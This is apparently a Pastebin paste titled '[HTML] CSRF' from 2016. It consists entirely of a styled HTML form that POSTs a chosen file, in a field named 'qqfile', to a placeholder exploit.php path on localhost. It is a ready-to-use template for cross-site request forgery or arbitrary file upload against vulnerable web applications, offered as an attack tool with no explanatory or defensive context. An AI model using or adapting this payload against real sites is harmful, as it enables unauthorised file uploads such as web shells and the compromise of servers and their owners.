Advertisement
K4MVR3T717

[HTML] CSRF

Sep 21st, 2016
1,761
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.32 KB | None | 0 0
  1. <center>
  2. <body bgcolor="black">
  3. <font color="red">
  4. <br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
  5. <form method="POST" action="https://localhost/path/exploit.php" enctype="multipart/form-data" >
  6. <input type="file" name="qqfile"><br>
  7. <input type="submit" name="Submit" value="Upload ?">
  8. <center>
  9. </form>
  10. </body>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement